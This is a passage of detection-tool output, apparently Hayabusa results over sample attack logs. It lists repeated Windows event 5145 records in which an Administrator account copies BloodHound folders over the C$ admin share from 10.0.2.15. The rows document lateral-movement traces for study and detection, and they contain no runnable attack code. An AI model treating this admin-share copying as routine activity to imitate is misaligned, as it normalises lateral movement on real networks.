Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead | 
IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings | IP Addr: 10.0.2.15 | 
LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
